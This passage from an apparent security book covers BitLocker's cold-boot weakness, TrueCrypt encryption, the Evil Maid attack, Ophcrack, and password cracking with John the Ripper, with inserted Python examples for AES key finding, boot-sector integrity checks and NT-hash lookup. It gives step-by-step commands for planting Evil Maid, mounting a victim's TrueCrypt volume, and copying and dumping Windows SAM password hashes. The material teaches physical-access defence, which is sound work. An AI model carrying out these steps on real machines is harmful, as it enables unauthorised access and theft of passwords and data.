10. The option to turn on BitLocker should become available. 
11. Click Turn On BitLocker, and follow the wizard through the setup process. 


[Figure: Vista Control Panel, BitLocker Drive Encryption. "BitLocker Drive Encryption encrypts and protects your data. BitLocker Drive Encryption helps prevent unauthorized access to any files stored on the volume shown below. You are able to use the computer normally, but unauthorized users cannot read or use your files." Volumes: C:, with the "Turn On BitLocker" link now available.]


BitLocker Hacks 


Once BitLocker has been implemented on a system, an attacker without the recovery key has little chance of getting into it. However, researchers at Princeton University found a workaround that works when certain conditions are present. They were not able to break into a BitLocker-encrypted system that had been completely shut down. They were able to unlock the drive by recovering the keys from RAM when the system was running in a locked, password-protected state; at that point the TPM has already released the volume key and it sits in memory.

By cooling the RAM with a common dust spray can (compressed air), the Princeton researchers slowed the rate at which the memory contents faded. They then booted the system to msramdmp, a small utility on a USB stick that has a tiny boot partition and dumps RAM into a partition of type Venix 80286. msramdmp, developed by Wesley McGrew, is available for free download at http://www.mcgrewsecurity.com/tools/msramdmp/. With an image of RAM in hand, the researchers used their AESkeyfind utility, which searches the image for AES key schedules, to locate the AES keys. AESkeyfind has been released to the public and is available on the Princeton website. However, the researchers have not released the final piece of the puzzle, the code that mounts the BitLocker volume within Linux using the recovered key. The video of the attack against BitLocker can be seen at http://citp.princeton.edu/memory/. It is definitely worth watching.
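What makes AES keys findable in a memory dump is that the expanded key schedule is stored next to the key, and the schedule is a deterministic function of the key. The finder below is an added example written for this page to show that idea; it is not the Princeton aeskeyfind code and is simpler than it (decay is modelled as a count of flipped bits, and no attempt is made to repair a decayed key byte). The "memory dump" it searches is constructed: pseudo-random noise with the FIPS-197 Appendix A key's schedule planted at offset 4096, and the seed, offset and image size are assumptions.

```python
"""Find AES-128 key schedules in a memory image by testing the key-expansion
relationship, the idea behind the Princeton aeskeyfind tool. Added example
written for this page, not the Princeton code; the 'memory dump' is
constructed (pseudo-random noise with one schedule planted at a known offset)."""
import random

RCON = [0x01, 0x02, 0x04, 0x08, 0x10, 0x20, 0x40, 0x80, 0x1B, 0x36]
SCHEDULE_LEN = 176      # 11 round keys of 16 bytes


def _xtime(a):
    """Multiply by x in GF(2^8) modulo the AES polynomial 0x11B."""
    a <<= 1
    return (a ^ 0x11B) & 0xFF if a & 0x100 else a


def _build_sbox():
    """Compute the AES S-box (inverse in GF(2^8), then the affine map) instead of typing 256 constants."""
    exp, log = [0] * 256, [0] * 256
    x = 1
    for i in range(255):        # 3 generates GF(2^8)*, so x visits every nonzero element
        exp[i], log[x] = x, i
        x ^= _xtime(x)          # x *= 3
    sbox = [0x63]               # S(0): the inverse of 0 is defined as 0
    for a in range(1, 256):
        inv = exp[(255 - log[a]) % 255]
        s = inv
        for r in range(1, 5):   # inv ^ rotl(inv,1) ^ ... ^ rotl(inv,4) ^ 0x63
            s ^= ((inv << r) | (inv >> (8 - r))) & 0xFF
        sbox.append(s ^ 0x63)
    return sbox


SBOX = _build_sbox()


def expand_key_128(key):
    """FIPS-197 key expansion: 16-byte key -> 176-byte schedule."""
    w = [list(key[i:i + 4]) for i in range(0, 16, 4)]
    for i in range(4, 44):
        t = list(w[i - 1])
        if i % 4 == 0:
            t = [SBOX[b] for b in t[1:] + t[:1]]    # RotWord + SubWord
            t[0] ^= RCON[i // 4 - 1]
        w.append([w[i - 4][j] ^ t[j] for j in range(4)])
    return bytes(b for word in w for b in word)


def _bit_errors(a, b):
    return sum(bin(x ^ y).count("1") for x, y in zip(a, b))


def find_aes128_keys(image, max_bit_errors=0):
    """Return [(offset, key, bit_errors)] for each 16-byte window whose expansion
    matches the 160 bytes that follow it within max_bit_errors. Allowing a few
    errors models the decay of cooled DRAM; aeskeyfind goes further and also
    repairs decayed key bytes using the redundancy in the schedule."""
    hits = []
    for off in range(len(image) - SCHEDULE_LEN + 1):
        cand = image[off:off + 16]
        # cheap pre-filter: derive only the first word of round key 1 before a full expansion
        t = [SBOX[b] for b in cand[13:16] + cand[12:13]]
        t[0] ^= RCON[0]
        w4 = bytes(cand[j] ^ t[j] for j in range(4))
        if _bit_errors(w4, image[off + 16:off + 20]) > max_bit_errors:
            continue
        errs = _bit_errors(expand_key_128(cand)[16:], image[off + 16:off + SCHEDULE_LEN])
        if errs <= max_bit_errors:
            hits.append((off, bytes(cand), errs))
    return hits


def build_sample_image(decay_bits=0, seed=7):
    """Constructed 8 KiB 'RAM dump': noise with the FIPS-197 Appendix A key's
    schedule planted at offset 4096; decay_bits random bits of the expanded
    round keys are flipped to imitate memory fade (assumed values)."""
    rng = random.Random(seed)
    image = bytearray(rng.getrandbits(8) for _ in range(8192))
    sched = bytearray(expand_key_128(bytes.fromhex("2b7e151628aed2a6abf7158809cf4f3c")))
    for _ in range(decay_bits):
        sched[rng.randrange(16, SCHEDULE_LEN)] ^= 1 << rng.randrange(8)
    image[4096:4096 + SCHEDULE_LEN] = sched
    return bytes(image)


if __name__ == "__main__":
    for off, key, errs in find_aes128_keys(build_sample_image(decay_bits=6), max_bit_errors=8):
        print(f"AES-128 key at 0x{off:x} ({errs} decayed bits): {key.hex()}")
```

Run against a real dump, the same function scans the file contents one offset at a time; the pre-filter keeps that affordable in pure Python, but a production tool would be written in C and would also search for AES-256 schedules and for the one-directional decay pattern the Princeton paper describes. The defensive lesson is the one the previous paragraph already states: a machine that is shut down (not sleeping, not locked) has no key in RAM to find.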


TrueCrypt 


TrueCrypt is an open source encryption product that works with any version of Windows 7 and Vista, as well as XP, 2003, 2008, Mac OS X, and Linux. It is one of the best products I have ever used and a great way to keep your data secure. The best part about TrueCrypt is the price; it is absolutely free. The latest version of TrueCrypt can be downloaded at http://www.TrueCrypt.org/downloads.

TrueCrypt allows users to encrypt a file container, a partition, or the system partition. It offers AES, Serpent and Twofish, as well as the cascades AES-Twofish, AES-Twofish-Serpent, Serpent-AES, Serpent-Twofish-AES and Twofish-Serpent. When you select an algorithm, a description and a corresponding web link are provided. TrueCrypt recommends a password longer than 20 characters.
It would be extremely difficult to recover the contents of a TrueCrypt volume without the password. One program, CrackTC, can run a dictionary attack against the password, but it may take a very long time, especially if the password is longer than 20 characters.

[Dialog: TrueCrypt Volume Creation Wizard. "WARNING: Short passwords are easy to crack using brute force techniques! We recommend choosing a password consisting of more than 20 characters. Are you sure you want to use a short password?"]


The best chance someone has at breaking into your TrueCrypt volume is to use a keystroke logger to capture the typed password or to set up a camera with a view of the computer's keyboard. If you are trying to gain access to someone's system partition that was encrypted with TrueCrypt, the rescue CD is worth locating, but note what it does and does not contain: it holds the boot loader and a backup of the encrypted volume header, not the password. Its value to an attacker is that the header backup is protected by the password in effect when the disc was created, so if the user later changed the password, the old password still unlocks the drive through the rescue disc.


Caution: Back up all your data before encrypting your system drive with TrueCrypt. The follow- 
ing steps are needed to encrypt a system partition using TrueCrypt: 


1. Double click on the TrueCrypt setup file. 

2. Read the license and accept the terms if you agree to be bound by the terms. 

3. Select Install and click Next. 

4. Click Install. You should see the message that TrueCrypt has been successfully installed. 


TrueCrypt Setup 


\ i ) TrueCrypt has been successfully installed. 


Lox] 


5. Click Yes to view the tutorial if you would like to view it. Otherwise click No. 
6. Click Finish. 

7. Double click on the TrueCrypt icon on the desktop. 

8. Click the Create Volume radio button. 


9. Select the bottom choice, “Encrypt the system partition or the entire system drive,” and click 
Next. 


[Dialog: TrueCrypt Volume Creation Wizard with three choices. "Create an encrypted file container: Creates a virtual encrypted disk within a file. Recommended for inexperienced users." "Encrypt a non-system partition/drive: Encrypts a non-system partition on any internal or external drive (e.g. a flash drive). Optionally, creates a hidden volume." "Encrypt the system partition or entire system drive: Encrypts the partition/drive where Windows is installed. Anyone who wants to gain access and use the system, read and write files stored on the system drive, will need to enter the correct password each time before Windows boots. Optionally, creates a hidden system." The third option is selected.]
10. There are two choices for encrypting the system drive: Normal and Hidden. Select Normal to encrypt the system partition. If you choose Hidden, TrueCrypt explains that the existence of the hidden operating system cannot be proven, which is meant for situations where you may be forced to reveal a password.

[Dialog: TrueCrypt Volume Creation Wizard, Type of System Encryption. "Normal: Select this option if you merely want to encrypt the system partition or the entire system drive." "Hidden: It may happen that you are forced by somebody to decrypt the operating system. There are many situations where you cannot refuse to do so (for example, due to extortion). If you select this option, you will create a hidden operating system whose existence will be impossible to prove. For a detailed explanation, please click the link below." Link: More information.]


11. Select the option to encrypt the whole drive. If this option is used, users will have to enter 
the TrueCrypt password in order to access the operating system each time the system is 
started. This will keep your computer safe from attacks that can be performed using a Live 
CD when an attacker gains physical access to your computer. 


[Dialog: TrueCrypt Volume Creation Wizard, Area to Encrypt. "Encrypt the Windows system partition: Select this option to encrypt the partition where the currently running Windows is installed and from which it boots." "Encrypt the whole drive: Select this option if you want to encrypt the entire drive on which the currently running Windows system is installed. Anyone who wants to access the system or files stored on the drive will need to enter the correct password each time before the system starts. This option cannot be used to encrypt a secondary or external drive if Windows is not installed on it and does not boot from it." The second option is selected.]


12. Select No to the option to encrypt the host protected area, or HPA. The HPA is an area of 
the hard drive that is normally reserved for manufacturer configuration. 

13. The next option allows the user to specify if their system is running more than one operating 
system, like in the case of a dual boot. If your system only has one operating system (most 
common), choose Single Boot. Click Next at the Number of Operating Systems screen. 
Note: The TrueCrypt program warns users that the option to encrypt multiboot systems is 
not really for the inexperienced user. 

14. Select an encryption algorithm from the list; the TrueCrypt program provides a detailed 
description of each encryption algorithm as they are selected from the list. You can accept 
the default choice of Advanced Encryption Standard, or AES. By clicking the Benchmark 
button twice, you will be able to view the speeds of each encryption algorithm in MB per 
second. Speed will vary depending on the horsepower of your computer. 
15. At the Password screen, select a good password that you can remember. It should include a combination of uppercase letters, lowercase letters, numbers, and special characters.

16. The next screen is titled Collecting Random Data. TrueCrypt asks you to move your mouse randomly within the window; the longer you move it, the more entropy goes into the encryption keys. Click Next when you are ready to go to the next screen in the setup process.

17. At the next screen, you choose where to save the TrueCrypt Rescue Disk ISO. The ISO must be burned to a CD before TrueCrypt lets you continue; use a program such as ImgBurn to burn it. Leave the CD in the drive after it finishes burning, because TrueCrypt verifies it before you can click Next in the volume creation wizard. Store the CD in a hidden location.


[Figure: ImgBurn writing TrueCrypt Rescue Disk.iso (label "TrueCrypt Rescue Disk", file system ISO9660, bootable, 896 sectors, 1,835,008 bytes) to a CD-R in an HP DVD Writer 640c at 1x, one copy.]


18. Click Next at the Rescue Disk Verified screen.

19. At the Wipe Mode selection screen, choose None unless you want to overwrite the remnants of deleted files and folders that may still exist on the disk. The wipe options are 3, 7, and 35 passes; 7 passes corresponds to the U.S. Department of Defense standard TrueCrypt cites.

20. Click Test, then OK, then Yes to restart your system. From now on you need the password to boot the system: type it at the TrueCrypt boot loader prompt and Windows starts. The password must be entered every time the system is booted.


[Figure: the TrueCrypt Boot Loader screen. "Keyboard Controls: [Esc] Skip Authentication (Boot Manager). Enter password:" with the TrueCrypt Foundation copyright line.]
Evil Maid


Evil Maid is a very interesting attack against TrueCrypt developed by Joanna Rutkowska. TrueCrypt allows users to encrypt their operating system volume, after which a password is required before the system will boot. The attack works by installing a keylogger in the unencrypted boot area: the attacker boots the target from a thumb drive and runs the Evil Maid program, which patches the TrueCrypt boot loader so that it records the password typed at the prompt.

At this point the keylogger is installed, but the attacker still does not have the password. To obtain it, the attacker waits for the user to boot the machine and enter the password, then comes back at a later time and runs the Evil Maid program again, which displays the captured TrueCrypt password.


To create an Evil Maid thumb drive and run it against a system whose operating system is encrypted with TrueCrypt:

1. Boot your system to any Linux distribution.
2. Download the Evil Maid image from http://invisiblethingslab.com/resources/evilmaid/evilmaidusb-1.01.img.
3. Open a terminal and type fdisk -l.
4. Insert a blank thumb drive into your system.
5. Type fdisk -l again to determine the device name assigned to the thumb drive, for example sdb.
6. Write the image to the thumb drive, substituting the path where you saved the image and the device name from the previous step: dd if=evilmaidusb-1.01.img of=/dev/sdb. This overwrites everything on that device, so double check the name.
7. Boot the laptop where TrueCrypt is installed to the thumb drive.
8. Run the Evil Maid program.
9. Come back later, after the password has been entered by the TrueCrypt user.
10. Run the Evil Maid program again and retrieve the password.

44 ■ Defense against the Black Arts


Some people think their system is safe from this attack because the laptop is set not to boot from a thumb drive. Many machines can still be booted to a device such as a thumb drive by pressing a key such as F8 when the computer is turned on. The hard drive can also be pulled from the system and placed in another system with a more "friendly" BIOS.
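Because Evil Maid lives in the unencrypted boot area, the practical check is to fingerprint that area from a boot you trust and compare it later, sector by sector. The script below is an added example written for this page (not Evil Maid or TrueCrypt code): it parses the MBR partition table, hashes each of the first sectors, and reports which sectors changed between a baseline and a later capture. The disk image it runs on is constructed, and the choice of 63 sectors (the first track, where the MBR and the TrueCrypt loader sit) is an assumption.

```python
"""Sector-level integrity check of the unencrypted boot area, the part of a
TrueCrypt-encrypted disk that Evil Maid modifies. Added example for this page
(not Evil Maid or TrueCrypt code): the disk image is constructed, and the
number of sectors to fingerprint is an assumption."""
import hashlib
import struct

SECTOR = 512
BOOT_SECTORS = 63   # assumption: the first track (MBR + TrueCrypt loader) is what must stay unchanged


def parse_mbr(sector0):
    """Return the non-empty entries of the classic MBR partition table."""
    if len(sector0) < SECTOR or sector0[510:512] != b"\x55\xaa":
        raise ValueError("no 0x55AA boot signature; not an MBR")
    entries = []
    for i in range(4):
        e = sector0[446 + 16 * i:462 + 16 * i]
        ptype = e[4]
        if ptype == 0:
            continue
        start_lba, size = struct.unpack_from("<II", e, 8)
        entries.append({"bootable": e[0] == 0x80, "type": ptype,
                        "start_lba": start_lba, "sectors": size})
    return entries


def fingerprint_boot_area(image, sectors=BOOT_SECTORS):
    """SHA-256 of each of the first `sectors` sectors; record this while the machine is known good."""
    return [hashlib.sha256(image[i * SECTOR:(i + 1) * SECTOR]).hexdigest()
            for i in range(sectors)]


def changed_sectors(baseline, current):
    """Sector numbers whose contents differ from the baseline (empty list == clean)."""
    return [i for i, (a, b) in enumerate(zip(baseline, current)) if a != b]


def build_disk(tampered=False):
    """Constructed image: MBR with one bootable NTFS partition at LBA 63, a
    stand-in 'TrueCrypt loader' in sectors 1-31, and a few sectors of partition data."""
    disk = bytearray((BOOT_SECTORS + 4) * SECTOR)
    disk[0:446] = bytes((i * 7) & 0xFF for i in range(446))           # stand-in MBR code
    disk[446:462] = struct.pack("<B3sB3sII", 0x80, b"\x01\x01\x00", 0x07, b"\xfe\xff\xff", 63, 4)
    disk[510:512] = b"\x55\xaa"
    for s in range(1, 32):                                              # stand-in loader sectors
        disk[s * SECTOR:(s + 1) * SECTOR] = bytes(((s * 31 + i) * 13) & 0xFF for i in range(SECTOR))
    if tampered:
        # Evil Maid patches the loader so the password prompt also records what is typed;
        # here that is simulated by overwriting part of sector 2.
        disk[2 * SECTOR + 64:2 * SECTOR + 96] = b"\x90" * 16 + b"HOOK:passwd->sector62 "[:16]
    return bytes(disk)


if __name__ == "__main__":
    baseline = fingerprint_boot_area(build_disk())
    print("partitions:", parse_mbr(build_disk()[:SECTOR]))
    print("changed sectors after tampering:", changed_sectors(baseline, fingerprint_boot_area(build_disk(True))))
```

To use this on a real machine, capture the boot area from media you control rather than from the installed OS (for example dd if=/dev/sda bs=512 count=63 of=boot.img from a live CD), store the fingerprint list off the machine, and compare after any period the laptop was out of your sight. This only covers the disk; a modified BIOS or firmware is outside what the check can see.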

Once the TrueCrypt password has been obtained, the files on the system can be viewed without knowing the Windows password. Boot the system to the BackTrack 4 R1 DVD and perform the following steps:


1. Open a terminal and type truecrypt.
2. Click Select Device in the lower right corner of the screen.
3. Select the partition (for example /dev/hda1), not the whole device, from the menu and click OK.

[Dialog: Select a Partition or Device, listing /dev/hda1.]

4. Click Mount, then click Options.
5. Check "Mount partition using system encryption (preboot authentication)".

[Dialog: Enter password for "/dev/hda1", with the options Cache passwords and keyfiles in memory, Display password, Use keyfiles, Mount volume as read-only, and Mount partition using system encryption (preboot authentication).]

6. Type in the password that Evil Maid reported as the TrueCrypt password and click OK.
7. If the volume mounts successfully, it appears in the list, mounted under a folder in the media directory; in the example, slot 4 shows /dev/hda1 (10.0 GB) mounted at /media/truecrypt4.
8. Type ls /media/truecrypt# (replacing # with the slot number shown, 4 in the example) to view the files and folders on the system.


Summary 


An attacker with physical access to most Windows machines can break into the operating system in a matter of seconds. Legitimate Windows programs like Sticky Keys and Utility Manager can be used to gain SYSTEM access on Microsoft Windows. Even systems with fingerprint and Smart Card readers are vulnerable to these attacks. Once SYSTEM access has been obtained, the attacker can wreak havoc on the computer's operating system: accounts can be created, disabled, activated, and deactivated; services such as the firewall and antivirus can be stopped and started; and the registry can be altered.

Physical security needs to be taken seriously. BitLocker can prevent some of the common physical attack vectors against Windows systems, like Sticky Keys and Utility Manager. However, BitLocker is only available on Server 2008 and the Ultimate and Enterprise editions of Windows Vista and 7. These versions come with a higher price tag than the other "lesser" versions of the operating systems. If you are serious about securing Windows from physical attack vectors, it might be worth the extra money to purchase the Ultimate version of Windows 7 or Vista. While you pay more for the higher-end operating system, you get an operating system that supports BitLocker volume encryption and, with it, more peace of mind. If you do plan to buy Ultimate and implement BitLocker, store the recovery keys in a safe place and turn the machine off when it is not in use! A final option is TrueCrypt, a free product that can also be used to secure the operating system.


Chapter 2 


Obtaining Windows 
Passwords 


Introduction 


Passwords are an integral part of our lives in today’s electronic world. Most people are accustomed 
to entering a username and password for their computers at work and home. In order to access 
their Gmail, Yahoo, Hotmail, or corporate email, individuals need a password. Many people do 
online banking or pay their bills online and need passwords to access their bank and credit card 
accounts online. In order to access their Facebook, Twitter, and MySpace accounts, users need a 
password. And, for shopping, many have Ebay and PayPal accounts, which also require a username 
and password. 

Passwords are the "keys to the kingdom" in many cases because once you have a user's account 
name and password, it is "game over." Even worse, many users reuse the same password (or a 
slight variation) across multiple accounts and from site to site on the Internet, which makes a 
single password a single point of failure for all of that person's accounts and possibly their 
identity. The most shocking part of the password puzzle is that people still commonly use the 
names of their family members, pets, favorite sports teams or music groups, and hobbies as their 
passwords. This is why revealing the password to a single account can be gold for an attacker. 

Using strong passwords with uppercase, lowercase, and special characters and a minimum 
length of 8 characters is advisable. It is a serious miscalculation, however, to believe that an 
extremely strong password alone will secure your account. Users tend to forget or write down 
their passwords when they are extremely complex. Companies have mechanisms like help desk 
staff or password reset features that can be exploited by people with social engineering skills. 
And the processing power of today's computers allows software programs like John the Ripper 
to crack many passwords in a matter of seconds or minutes. 

If you have the strongest password of any user on Ebay, and fall victim to a phishing scheme, 
your password and your account can still be compromised. If you have the strongest password 
in your company, and the company is not using encryption, your password can be revealed in 
network traffic or by analyzing accounts on the system. Even a very strong password over an 
encrypted HTTPS session can be compromised during a "man-in-the-middle attack." 

Passwords are extremely important to securing our data and identities. Many high-profile 
cases exist in the media, including those of Paris Hilton and Sarah Palin, where passwords have 
been cracked by an attacker. It is important to understand the vulnerabilities associated with 
passwords and the mechanisms that can be used to keep your passwords out of the hands of the 
attacker. 


Ophcrack 


Ophcrack is a Live CD that was designed to crack Windows passwords. It is a free utility and it 
works with Windows 2000, XP, 2003, Vista, 2008, and Windows 7. The Live CD comes in two 
versions, one for XP and one for Windows Vista. The XP Live CD should be used on Windows 
2000, XP, and 2003 systems. The Vista Live CD should be used on Vista, 2008, and Windows 7 
systems. Ophcrack is the easiest way to get a user's password when you have physical access to a 
machine. Just boot to the Live CD and it will find the user accounts and their corresponding 
passwords with little difficulty. The Ophcrack Live CDs are available for download at 
http://ophcrack.sourceforge.net/. 


[Screenshot: the ophcrack LiveCD download page. The latest version of ophcrack LiveCD is 2.3.0 (including ophcrack 3.3.0). ophcrack XP LiveCD: ophcrack-xp-livecd-2.3.0.iso, md5sum d7f2bb179b1554cd7884e1a3efc8553c. ophcrack Vista LiveCD: ophcrack-vista-livecd-2.3.0.iso, md5sum 104461388ac8e5135b80cc2b373fad96] 


After downloading the Live CD, use the image burn program to burn the ISO file to CD. 
After opening the image burn program, select "Write image file to disc." 


[Screenshot: the image burning program with ophcrack-vista-livecd-2.3.0.iso selected as the source (ISO9660, bootable, 516,911,104 bytes) and a CD-R as the destination, ready to write] 
Restart the Windows system and boot the Ophcrack Live CD. Chapter 1 covers in detail how 
to ensure a system will boot up to CD/DVD. Once the system boots to the Live CD, no additional 
user interaction is required. All of the Windows accounts will be displayed along with their 
corresponding passwords that the program is able to crack. 


[Screenshot: Ophcrack results (Tables / Crack) with columns User, LM Hash, NT Hash, LM Pwd 1, LM Pwd 2, NT Pwd; the hashes are truncated on screen. The legible results are:] 

User               LM Pwd 1    LM Pwd 2    NT Pwd 
Guest              -           -           empty 
HelpAssistant      not found   not found   not found 
SUPPORT_388945a0   not found   -           not found 
jesse              NEWPASS     WORD        newpassword 
kim                FEBRUAR     Y12         february12 
mason              not found   -           not found 
sportsguy          LAKERS2     009         lakers2009 

Do not be disappointed if Ophcrack does not reveal the Windows password. If you save the 
hashes, there are other tools that can be used to obtain the passwords. To save the hashes, click 
the Save button and click Save to File. Double click on the Tux folder in the left-hand pane of the 
Save File dialog box, and click Save. 


[Screenshot: the Save File dialog, with the Tux home folder (Desktop, Documents, Images, Templates, launch.sh) selected, Files of type: All Files (*)] 


Insert a USB device into the system so you can copy the ophcrack.txt file with the hashes. 
Click the terminal button to open a shell. 




The following steps are needed to mount the USB drive and copy the file to the device: 


1. Type the command su - root to switch to the root user. 
2. When prompted for the root password, type root. 
3. Type the command fdisk -l to view the partition table (letter l, not number 1). 
4. Mount the disk by typing mount /dev/sda1 /media/usbdisk. 
Note: The last drive letter designation in the list should be the correct one. 
5. Type cp /home/tux/ophcrack.txt /media/usbdisk to copy the ophcrack.txt file. 
6. Type umount /media/usbdisk to unmount the device. 
Password Hashes 


The free version of Ophcrack ships with a limited set of rainbow tables. According to the website, 
the free tables will recover 99.9 % of alphanumeric passwords, so if a user uses special characters, 
such as # or %, it is extremely unlikely that their password will be cracked with them. The company 
Objectif Securite also sells more extensive tables; you can browse through their selection at 
http://ophcrack.sourceforge.net/tables.php. And, while it may not have found the password for all 
of the accounts on the system, Ophcrack was able to extract the hashes. There are two types of 
hashes, LM and NTLM. LAN Manager, or LM, hashes are the weaker of the two and are stored by 
all versions of Microsoft Windows prior to Vista. The LM hash is computed over two seven-character 
halves of the password and therefore covers at most 14 characters. The main purpose of keeping 
the LM hash is backwards compatibility with legacy versions of Microsoft operating systems. The 
NTLM, or New Technology LAN Manager, hash is stronger; it is used by all of these versions of 
Windows, and from Vista onward it is the one Windows relies on by default. 

Once a Windows hash is obtained, a variety of tools can be utilized to get the password, 
including John the Ripper, the website http://nediam.com.mx, and rainbow tables. Open the text 
file with the hashes with Wordpad instead of Notepad. Each username has two hashes associated 
with it. The first hash is the LM hash and the second hash listed is the NTLM hash. A breakdown 
of the ophcrack.txt file (seven entries per line): 


1st entry   2nd entry   3rd entry   4th entry   5th entry   6th entry   7th entry 
Username    RID         LM hash     NTLM hash   LM pass 1   LM pass 2   NT pass 


Nediam.com.mx 


The link http://nediam.com.mx/winhashes/index.php allows you to submit these password hashes 
(LM or NTLM) to its online database. If the hash already exists in its database, the website will 
display the corresponding password. If the website does not have the password for the hash, it 
will use its rainbow tables to locate the password within 24 hours. Note: This seems to be valid for 
Monday-Friday only and requires 24 business hours. 


[Screenshot: Windows Hashes Repository 1.0 at http://nediam.com.mx/winhashes/search_nt_hash.php in Internet Explorer, with the Search Plaintext Password and Search NT Hash options. Notes on the page: the NT hash must be entered as a 32-character hex string; an NT hash from the ophcrack.txt file is pasted into the NT Hash field] 


John the Ripper 


John the Ripper can also be utilized to break passwords on a local Windows machine. John the 
Ripper is a password cracker that is capable of breaking Windows and Linux passwords. John the 
Ripper may take some time to break some of the more difficult passwords; a computer with more 
memory and processing power will help make the cracking process go quicker. If a crack is taking 
longer than 24 hours, consider using nediam.com.mx or the rainbow tables. 

To crack Linux and Unix passwords with John, the /etc/shadow file is needed. When cracking 
Windows passwords, the SAM and the system files are required. The SAM and system files 
are both hive files from the Windows registry, which is a database of user and computer settings. Two 
tools, bkhive and samdump2, can be used to get the hashes off a Windows machine that is booted 
to the BackTrack Live DVD. 

The following steps are needed to get the Windows hashes using the BackTrack 4 DVD: 


1. Boot the system up to the BackTrack 4 DVD. 
2. Log in as root with the password of toor. Type startx to bring up the GUI. 
3. Open a terminal and type the command fdisk -l to view the partitions. 
4. In this case, the Windows partition will be mounted to /mnt/sda1. 
Note: This can vary based on your disk and partition configuration. 
5. Navigate to the config directory by typing the following (case sensitive): 
cd /mnt/sda1/Windows/system32/config 
Note: Change this to match the fdisk output. For example, if you saw /dev/hda1, use /mnt/hda1 instead of /mnt/sda1. 
[Screenshot: BackTrack Konsole session showing the fdisk -l output and the change into the config directory] 


7. To copy both the SAM and the system files (case sensitive) to the jtr directory, type cp SAM 
system /pentest/password/jtr. 
8. Type ls /pentest/password/jtr to verify that system and SAM have been copied. 
9. Navigate to the jtr directory by typing cd /pentest/password/jtr. 
10. Type bkhive system bootkey. 
Note: A bootkey should be displayed. 
11. Type the following command to extract the hashes: 
samdump2 SAM bootkey > winhashes.txt 
Note: The message Root Key : SAM should be displayed. 


[Screenshot: Konsole session showing the bkhive bootkey output and the samdump2 run] 


12. Type the following command to view the hashes: 
more winhashes.txt 

13. Type the following command to edit the winhashes.txt file: 
kwrite winhashes.txt 

14. Erase all of the accounts and corresponding hashes that you do not want John to waste time 
and energy trying to find, such as SUPPORT_388945a0, HelpAssistant, and Guest. The real 
Administrator account has the RID of 500 even if it has been renamed. Save the file. 


[Screenshot: winhashes.txt open in KWrite, one line per account in the form user:RID:LM hash:NT hash::: (Administrator:500:..., Guest:501:..., HelpAssistant:1000:..., SUPPORT_388945a0:1002:..., jesse:1004:..., mason:1005:...); the context menu (Cut, Copy, Paste, Select All) is used to delete the unwanted lines] 

15. Type the following command to run the hashes through John the Ripper: 
./john winhashes.txt 
The displayed password is steelers. Sorry Browns, Bengals, and Ravens fans! 


[Screenshot: Konsole window in /pentest/password/jtr showing the John the Ripper run] 


Rainbow Tables 


Rainbow tables are a group of tables in which hashes and their corresponding password values are 
already precomputed. Any user on any Windows system who has the password of lakers2009 will 
have a corresponding NTLM hash of aa65f52cfc96b9b86b94ed8263639901. Because the hash 
depends only on the password, it does not vary from machine to machine. 

If a user on a system had a password of lakers2009, and that hash and password are in the 
rainbow table you are running the hash against, the password will be displayed. There is no 
cracking with rainbow tables; all of the cracking (or heavy lifting) is done beforehand. If a user's 
hash is not within the rainbow table, the password will not be displayed. In the example table 
below, only three hashes and their corresponding passwords are listed. So, in order for this sample 
table to provide the password for a given NTLM hash, the password would need to be february12, 
lakers2009, or password. Obviously the larger the rainbow table, the more chances your hash 
will be included. However, a larger rainbow table also means a longer search time through the 
hashes and their corresponding passwords. It can take a while to search for a hash and its 
password through a very large rainbow table. 


NTLM Hash                           Corresponding Password 
9360e1a9f7fee5df75edba64f8b3c897    february12 
aa65f52cfc96b9b86b94ed8263639901    lakers2009 
8846f7eaee8fb117ad06bdd830b7586c    password 


Most rainbow tables will have certain character sets within them. For example, some rainbow 
tables might have letters, numbers, special characters, or all three. Rainbow tables will become 
larger as the number of values in the table increases. However, a more extensive rainbow table will 
increase the chances that a password can be cracked. 
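The following Python script is an added example; it is not code from the book or from Ophcrack, samdump2 or any other tool the chapter describes. It ties the Password Hashes breakdown and this rainbow table section together: it parses a dump in the user:RID:LM hash:NT hash::: layout shown above, computes NT hashes the way Windows does (MD4 over the UTF-16LE password, with no salt, which is exactly why the same password produces the same hash on every machine and why a precomputed table works at all), builds a toy hash-to-password table from a short word list, and reports for each account whether an LM hash is still stored, whether it is the built-in Administrator (RID 500), and whether its NT hash is in the table. The sample dump, the word list, the sportsguy RID and the helper names (md4, nt_hash, parse_pwdump, build_table, audit) are constructed for this example; MD4 is implemented inline because hashlib's md4 is missing from many OpenSSL 3 builds.

```python
# Added example, not code from the book or from Ophcrack/samdump2: parse a
# pwdump-style dump, compute NT hashes the way Windows does and look them up
# in a tiny precomputed table.  MD4 is implemented inline because hashlib's
# md4 is missing from many OpenSSL 3 builds.
import struct

MASK32 = 0xFFFFFFFF
# LM hash stored when the password is empty or LM hashing is disabled.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"


def _lrot(x: int, n: int) -> int:
    return ((x << n) | (x >> (32 - n))) & MASK32


def md4(data: bytes) -> bytes:
    """RFC 1320 MD4 in pure Python (little-endian words)."""
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    msg = bytearray(data) + b"\x80"
    while len(msg) % 64 != 56:
        msg += b"\x00"
    msg += struct.pack("<Q", (len(data) * 8) & 0xFFFFFFFFFFFFFFFF)
    f = lambda p, q, r: (p & q) | (~p & r)
    g = lambda p, q, r: (p & q) | (p & r) | (q & r)
    h = lambda p, q, r: p ^ q ^ r
    for off in range(0, len(msg), 64):
        w = struct.unpack("<16I", msg[off:off + 64])
        aa, bb, cc, dd = a, b, c, d
        for i in range(16):  # round 1: F, message words in order
            a = _lrot((a + f(b, c, d) + w[i]) & MASK32, (3, 7, 11, 19)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):  # round 2: G, words 0,4,8,12,1,5,9,13,...
            k = (i % 4) * 4 + i // 4
            a = _lrot((a + g(b, c, d) + w[k] + 0x5A827999) & MASK32, (3, 5, 9, 13)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):  # round 3: H, words 0,8,4,12,2,10,6,14,...
            k = (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)[i]
            a = _lrot((a + h(b, c, d) + w[k] + 0x6ED9EBA1) & MASK32, (3, 9, 11, 15)[i % 4])
            a, b, c, d = d, a, b, c
        a, b, c, d = (a + aa) & MASK32, (b + bb) & MASK32, (c + cc) & MASK32, (d + dd) & MASK32
    return struct.pack("<4I", a, b, c, d)


def nt_hash(password: str) -> str:
    """Windows NT hash: MD4 of the UTF-16LE password, no salt, hex encoded."""
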